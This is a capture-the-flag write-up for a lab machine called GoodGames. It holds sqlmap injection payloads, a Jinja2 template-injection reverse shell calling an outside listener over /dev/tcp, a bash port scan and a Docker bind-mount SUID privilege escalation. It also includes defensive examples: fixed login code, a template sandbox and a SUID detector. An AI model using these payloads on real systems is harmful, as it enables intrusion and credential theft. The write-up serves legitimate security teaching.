GoodGames

Recon

nmap_scan.log
Open 10.129.73.122:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.73.122

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Werkzeug httpd 2.0.2 (Python 3.9.2)
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
|_http-favicon: Unknown favicon MD5: 61352127DC66484D3736CACCF50E7BEB
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD POST

HTTP (80)

Writeup.png
└─$ feroxbuster -u 'http://10.129.73.122/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -I .css,.png -x .php -n
302      GET        4l       24w      208c http://10.129.73.122/logout => http://10.129.73.122/
200      GET      663l     1856w    31374c http://10.129.73.122/blog/1
200      GET      730l     2069w    32744c http://10.129.73.122/forgot-password
200      GET        0l        0w    44212c http://10.129.73.122/blog
200      GET      728l     2070w    33387c http://10.129.73.122/signup
200      GET     1735l     5548w    85107c http://10.129.73.122/
403      GET        9l       28w      278c http://10.129.73.122/server-status

We can register an account, but the profile page only shows our own details and offers a change-password form; nothing else is exposed to a normal user.

Writeup-1.png

There is a single readable blog post, and its author is admin, which gives us a username to target.

Writeup-2.png

SQLi is possible in the login form. Previously I was testing for SSTI, which is why you see a weird combination of characters as the username.

Writeup-3.png
└─$ sqlmap -u 'http://10.129.73.122/login' --data 'email=x%40y.z&password=x' -p email --batch --threads 10 --level 5 --risk 3 --current-db
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: email=x@y.z' AND 5413=(SELECT (CASE WHEN (5413=5413) THEN 5413 ELSE (SELECT 4179 UNION SELECT 2612) END))-- dWqe&password=x

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=x@y.z' AND (SELECT 7703 FROM (SELECT(SLEEP(5)))TxLG)-- GUOh&password=x
---
[16:54:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
current database: 'main'
└─$ sqlmap -u 'http://10.129.73.122/login' --data 'email=x%40y.z&password=x' -p email --threads 10 --batch -D main --dump --time-sec 99 --flush-session
[*] starting @ 17:06:31 /2024-12-14/
...
[23:44:23] [WARNING] no clear password(s) found
Database: main
Table: user
[3 entries]
+----+----------------------+----------------------+----------------------------------+
| id | email                | name                 | password                         |
+----+----------------------+----------------------+----------------------------------+
| 1  | admin@goodgames.htb  | admin                | 2b22337f218b2d82dfc3b6f77e7cb8ec |
| 2  | test02@goodgames.htb | test02@goodgames.htb | b83183e0b27227533a6478de3265f0c0 |
| 3  | x@y.z                | ${{<%[%'"}}%\\       | d9adf054aa8466a9426a1fcfb811a47c |
+----+----------------------+----------------------+----------------------------------+
Writeup-4.png

The password column holds 32 hex characters, i.e. unsalted MD5 (hashcat mode 0, or any online lookup); admin's hash cracks to superadministrator.

Creds: admin:superadministrator
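An added example, not the writeup's code and not the GoodGames application's source, that stands in for the vulnerable login: it shows why the `email` parameter is injectable, how a boolean-blind oracle recovers the admin hash one character at a time (the work sqlmap automated above), and the parameterized fix. SQLite stands in for the box's MySQL, the rows are constructed to match the dump, and the exact query the app builds is an assumption; password storage as unsalted MD5 is consistent with the dump.

```python
"""Stand-in for the GoodGames login (added example, not the app's code).
Assumptions: the app builds its query by string interpolation, hashes the
password with unsalted MD5, and our own account x@y.z exists (it does, row 3)."""
import hashlib
import sqlite3


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed data: the three rows from the sqlmap dump (test02's password assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, email TEXT, name TEXT, password TEXT)")
    rows = [
        (1, "admin@goodgames.htb", "admin", "superadministrator"),
        (2, "test02@goodgames.htb", "test02@goodgames.htb", "test02"),
        (3, "x@y.z", "${{<%[%'\"}}%\\\\", "x"),            # the account we registered
    ]
    for rid, email, name, pw in rows:
        db.execute("INSERT INTO user VALUES (?, ?, ?, ?)", (rid, email, name, md5_hex(pw)))
    return db


def login_vulnerable(db: sqlite3.Connection, email: str, password: str) -> bool:
    """The bug sqlmap found: the email value is spliced into the SQL text."""
    sql = f"SELECT id FROM user WHERE email = '{email}' AND password = '{md5_hex(password)}'"
    return db.execute(sql).fetchone() is not None


def login_fixed(db: sqlite3.Connection, email: str, password: str) -> bool:
    """The fix: bound parameters, so user input can never become SQL syntax."""
    sql = "SELECT id FROM user WHERE email = ? AND password = ?"
    return db.execute(sql, (email, md5_hex(password))).fetchone() is not None


def blind_extract(db: sqlite3.Connection, column: str = "password",
                  row_id: int = 1, length: int = 32):
    """Boolean-blind extraction, the way sqlmap's first payload works.
    Every probe logs in as our own account with an appended condition; the
    trailing '-- ' comments out the password check, so the login succeeds
    exactly when the condition is true. Returns (value, number_of_probes)."""
    inner = f"SELECT {column} FROM user WHERE id = {row_id}"
    value, probes = "", 0
    for pos in range(1, length + 1):
        lo, hi = 32, 127                   # printable ASCII; binary search, ~7 probes/char
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({inner}), {pos}, 1)) > {mid}"
            probes += 1
            if login_vulnerable(db, f"x@y.z' AND ({cond})-- ", "irrelevant"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value, probes


if __name__ == "__main__":
    db = build_db()
    # classic auth bypass: True on the vulnerable query, False on the fixed one
    print(login_vulnerable(db, "admin@goodgames.htb' OR 1=1-- ", "anything"))
    print(login_fixed(db, "admin@goodgames.htb' OR 1=1-- ", "anything"))
    recovered, n = blind_extract(db)
    print(recovered, recovered == md5_hex("superadministrator"), n)
```

Each character costs about seven requests, so a 32-character hash is roughly 220 requests per row. In sqlmap's fallback time-based mode every one of those waits at least `--time-sec` seconds, which is why the dump with `--time-sec 99` above ran from 17:06 to 23:44.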

Logged in as admin, the profile page has an extra action that links to an administration tool on a separate vhost (it needs an /etc/hosts entry for the name below):

Writeup-5.png

http://internal-administration.goodgames.htb/login

We can log in with the same credentials. The only functionality in this application is editing Settings. nmap already identified Werkzeug/Python, i.e. Flask with Jinja2 templates, so a template-injection probe in the Settings form is the obvious test, and it renders: SSTI confirmed.

Writeup-6.png
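An added example (not the writeup's code and not the GoodGames application) of what is going on behind that SSTI: a Flask/Jinja2 app that renders user input as template source, the `cycler.__init__.__globals__.os` chain the reverse-shell payload uses, and the two fixes. It needs the `jinja2` package; `os.getcwd()` stands in for the `popen()` call, and the function and constant names are mine.

```python
"""Jinja2 SSTI demo (added example, not the app's code). Requires jinja2."""
import os
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

PROBE = "{{ 7*7 }}"
# Same attribute chain as the reverse-shell payload: the `cycler` global is a class
# from jinja2.utils, its __init__ is a plain function, a function's __globals__ is the
# module namespace of jinja2.utils, and that module imports os.
GADGET = "{{ cycler.__init__.__globals__.os.getcwd() }}"


def render_user_input_as_template(user_input: str) -> str:
    """The bug: the user's string IS the template, i.e. render_template_string(user_input)."""
    return Environment().from_string(user_input).render()


def render_user_input_as_data(user_input: str) -> str:
    """Fix 1: a fixed template; user input is a variable and is never parsed."""
    return Environment(autoescape=True).from_string("Hello {{ name }}").render(name=user_input)


def render_sandboxed(template_source: str) -> str:
    """Fix 2 (only when templates must be user-authored): the sandbox refuses
    underscore-prefixed and internal attributes such as __init__/__globals__."""
    return SandboxedEnvironment().from_string(template_source).render()


def gadget_reaches_os() -> bool:
    """True when the unsandboxed render actually executed os.getcwd() for us."""
    return render_user_input_as_template(GADGET) == os.getcwd()


def gadget_blocked_by_sandbox() -> bool:
    try:
        render_sandboxed(GADGET)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    print(render_user_input_as_template(PROBE))   # 49  -> template injection confirmed
    print(render_user_input_as_data(PROBE))       # Hello {{ 7*7 }}  -> input stayed data
    print(gadget_reaches_os(), gadget_blocked_by_sandbox())
```

Two practical notes on the real payload: `os.popen(...).read()` does not return until the spawned shell exits, so the HTTP request that delivers the reverse shell hangs for as long as the shell is alive, and the sandbox is a mitigation, not a substitute for never handing user input to `render_template_string`.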

Reverse Shell

{{ cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1"').read() }}
└─$ pwncat-cs -lp 4444
[06:22:39] Welcome to pwncat 🐈!                                                          __main__.py:164
[06:23:15] received connection from 10.129.73.122:46418                                        bind.py:84
[06:23:17] 10.129.73.122:46418: registered new host w/ db                                  manager.py:957
(local) pwncat$
(remote) root@3a453ab39d3d:/backend# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@3a453ab39d3d:/backend/project# cat .env
DEBUG=True
SECRET_KEY=S3cr3t_K#Key
DB_ENGINE=postgresql
DB_NAME=appseed-flask
DB_HOST=localhost
DB_PORT=5432
DB_USERNAME=appseed
DB_PASS=pass
(remote) root@3a453ab39d3d:/backend/project# ip -brief a s
lo               UNKNOWN        127.0.0.1/8
eth0@if6         UP             172.19.0.2/16

(remote) root@3a453ab39d3d:/backend/project# ip='172.19.0.1'; for i in $(seq 1 65000); do ( echo > /dev/tcp/$ip/$i) > /dev/null 2>&1 && echo $ip":"$i "is open"; done
172.19.0.1:22 is open
172.19.0.1:80 is open
(remote) root@3a453ab39d3d:/home/augustus# arp -a
? (172.19.0.1) at 02:42:68:3f:98:63 [ether] on eth0

The only neighbour is 172.19.0.1, the bridge gateway, which is the Docker host itself; curl against its port 80 returns the main goodgames.htb site.

/home/augustus exists inside the container, but no user augustus is defined in it: ls shows the files owned by raw uid/gid 1000 with no name to resolve. That is the signature of a directory bind-mounted from the host.

(remote) root@3a453ab39d3d:/home/augustus# ls -Alh
total 16K
lrwxrwxrwx 1 root root    9 Nov  3  2021 .bash_history -> /dev/null
-rw-r--r-- 1 1000 1000  220 Oct 19  2021 .bash_logout
-rw-r--r-- 1 1000 1000 3.5K Oct 19  2021 .bashrc
-rw-r--r-- 1 1000 1000  807 Oct 19  2021 .profile
-rw-r----- 1 root 1000   33 Dec 14 21:23 user.txt

User.txt

(remote) root@3a453ab39d3d:/home/augustus# cat user.txt
4262d99565c6807580a53ccc1aa04cda

Privilege Escalation

SSH is not reachable from outside (nmap saw only port 80), but the host listens on the Docker bridge address, so we can SSH to 172.19.0.1 from the container. The admin password is reused for augustus.

(remote) root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
augustus@172.19.0.1 password: superadministrator
augustus@GoodGames:~$ id
uid=1000(augustus) gid=1000(augustus) groups=1000(augustus)

Get processes

augustus@GoodGames:/var$ ps aux | grep -v '\[.*\]' | grep root
root         1  0.0  0.2 165260  9964 ?        Ss   Dec14   0:02 /sbin/init
root       443  0.0  0.2  22264  8408 ?        Ss   Dec14   0:00 /lib/systemd/systemd-journald
root       468  0.0  0.1  21532  5512 ?        Ss   Dec14   0:00 /lib/systemd/systemd-udevd
root       503  0.0  0.2  47816 10524 ?        Ss   Dec14   0:00 /usr/bin/VGAuthService
root       504  0.0  0.1 236980  7924 ?        Ssl  Dec14   0:27 /usr/bin/vmtoolsd
root       588  0.0  0.0   6680  2776 ?        Ss   Dec14   0:00 /usr/sbin/cron -f
root       593  0.0  0.1 219760  4488 ?        Ssl  Dec14   0:00 /usr/sbin/rsyslogd -n -iNONE
root       595  0.0  0.1  15272  7216 ?        Ss   Dec14   0:00 /lib/systemd/systemd-logind
root       664  0.0  0.1   9560  5804 ?        Ss   Dec14   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root       774  0.0  0.5 195416 20688 ?        Ss   Dec14   0:01 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
root       782  0.0  0.0   5780  1688 tty1     Ss+  Dec14   0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root       784  0.0  1.1 1344724 48360 ?       Ssl  Dec14   0:16 /usr/bin/containerd
root       874  0.0  0.2  15332  8224 ?        Ss   Dec14   0:01 /usr/sbin/apache2 -k start
root       938  0.0  2.0 1457176 83832 ?       Ssl  Dec14   0:06 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root      1046  0.0  1.5 641128 61456 ?        Ssl  Dec14   0:11 PM2 v5.1.2: God Daemon (/root/.pm2)
root      1276  0.0  0.1 1222636 7548 ?        Sl   Dec14   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8085 -container-ip 172.19.0.2 -container-port 8085
root      1290  0.0  0.2 711700 12084 ?        Sl   Dec14   0:01 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 3a453ab39d3df444e9b33e4c1d9f2071827b3b7b20a8d3357b7754a84b06685f -address /run/containerd/containerd.sock
root      1310  0.0  1.4 523372 57324 ?        Ssl  Dec14   0:08 python3 project/run.py
root      7721  0.0  0.0   4292   720 ?        S    11:28   0:00 /bin/sh -c /bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1"
root      7722  0.0  0.0  19708  3196 ?        S    11:28   0:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.14.113/4444 0>&1
root      7723  0.0  0.0  19948  3672 ?        S    11:28   0:00 /bin/bash -i
root      7743  0.0  0.0  20684  2232 ?        S    11:28   0:00 /usr/bin/script -qc /bin/bash /dev/null
root      7744  0.0  0.0   4292   712 pts/0    Ss   11:28   0:00 sh -c /bin/bash
root      7745  0.6  0.2  26532 10312 pts/0    S    11:28   0:08 /bin/bash
root     18732  0.0  0.1  45188  5420 pts/0    S+   11:47   0:00 ssh augustus@172.19.0.1
augustus 18782  0.0  0.0   6176   716 pts/0    S+   11:49   0:00 grep root

Enumerate ports and applications

augustus@GoodGames:/var$ ss -tunlp
Netid      State       Recv-Q      Send-Q           Local Address:Port            Peer Address:Port
udp        UNCONN      0           0                      0.0.0.0:68                   0.0.0.0:*
tcp        LISTEN      0           128                  127.0.0.1:8000                 0.0.0.0:*
tcp        LISTEN      0           70                   127.0.0.1:33060                0.0.0.0:*
tcp        LISTEN      0           128                  127.0.0.1:3306                 0.0.0.0:*
tcp        LISTEN      0           128                  127.0.0.1:8085                 0.0.0.0:*
tcp        LISTEN      0           128                 172.19.0.1:22                   0.0.0.0:*
tcp        LISTEN      0           128                          *:80                         *:*

Nothing new: 8000 and 8085 on localhost are the proxied Flask apps, 3306/33060 are MySQL, and sshd is bound only to 172.19.0.1, which is why it was reachable from the container and invisible from outside.

The container (hostname 3a453ab39d3d, the same ID as the containerd-shim in the process list) shares /home/augustus with the host: a file created as augustus on the host shows up in the container owned by raw uid/gid 1000. We are root inside the container but an unprivileged user on the host. Docker does not enable user-namespace remapping (`userns-remap`) by default, so uid 0 in the container is uid 0 on the host, and ownership and mode bits, the setuid bit included, live on the shared inodes. A file we chown to root and chmod 4755 from the container is therefore a root-owned SUID binary when augustus runs it on the host.

augustus@GoodGames:~$ echo x > x
augustus@GoodGames:~$ ls -l x
-rw-r--r-- 1 augustus augustus 2 Dec 15 11:53 x
augustus@GoodGames:~$ exit
Connection to 172.19.0.1 closed.

(remote) root@3a453ab39d3d:/home/augustus# ls -l x
-rw-r--r-- 1 1000 1000 2 Dec 15 11:53 x
(remote) root@3a453ab39d3d:/home/augustus# cp /bin/bash .
(remote) root@3a453ab39d3d:/home/augustus# chmod 4777 bash
(remote) root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1
augustus@GoodGames:~$ ls -l bash
-rwsrwxrwx 1 root root 1099016 Dec 15 11:54 bash
augustus@GoodGames:~$ ./bash -p
./bash: error while loading shared libraries: libtinfo.so.5: cannot open shared object file: No such file or directory

The container's bash is linked against libtinfo.so.5, which the host does not have, so do it the other way round: copy the host's own /bin/bash as augustus, then make it root-owned and SUID from the container.

augustus@GoodGames:~$ cp /bin/bash rootbash
augustus@GoodGames:~$ exit

(remote) root@3a453ab39d3d:/home/augustus# chown root:root rootbash
(remote) root@3a453ab39d3d:/home/augustus# chmod 4777 rootbash
(remote) root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1

augustus@GoodGames:~$ ./rootbash -p
rootbash-5.1# id
uid=1000(augustus) gid=1000(augustus) euid=0(root) groups=1000(augustus)
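An added example, not part of the writeup: the host-side check a defender would want for this escalation. The attack leaves behind a root-owned setuid file in a directory a container can write to, and this walker flags exactly that pattern. The list of package-managed prefixes and the function names are my assumptions.

```python
"""Find setuid files that look like the rootbash trick (added example)."""
import os
import stat
from typing import Iterable, List, NamedTuple

# Assumed set of directories where setuid binaries legitimately live.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                    "/bin/", "/sbin/")


class Finding(NamedTuple):
    path: str
    uid: int
    mode: int          # full st_mode; print with oct()


def is_suspect(path: str, st_mode: int, st_uid: int) -> bool:
    """Flag a regular setuid file that is root-owned outside the trusted
    prefixes (rootbash in /home/augustus), or setuid and group/world-writable
    anywhere (chmod 4777 above makes it writable by everyone)."""
    if not stat.S_ISREG(st_mode) or not st_mode & stat.S_ISUID:
        return False
    outside_system = not path.startswith(TRUSTED_PREFIXES)
    writable = bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return (st_uid == 0 and outside_system) or writable


def scan(roots: Iterable[str]) -> List[Finding]:
    """Walk the given roots with lstat (symlinks are not followed and not regular files)."""
    findings: List[Finding] = []
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if is_suspect(p, st.st_mode, st.st_uid):
                    findings.append(Finding(p, st.st_uid, st.st_mode))
    return findings


if __name__ == "__main__":
    for f in scan(["/home", "/tmp", "/var/tmp"]):
        print(f"{oct(f.mode & 0o7777)} uid={f.uid} {f.path}")
```

The one-liner equivalent on the host is `find /home /tmp -xdev -type f -perm -4000 -ls`. Preventing the technique rather than detecting it means enabling `userns-remap` so container root maps to an unprivileged host uid, and not bind-mounting home directories into containers at all.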

Root.txt

rootbash-5.1# cat /root/root.txt
24b3c43b0d89ada33653b7bc8aa1ff36
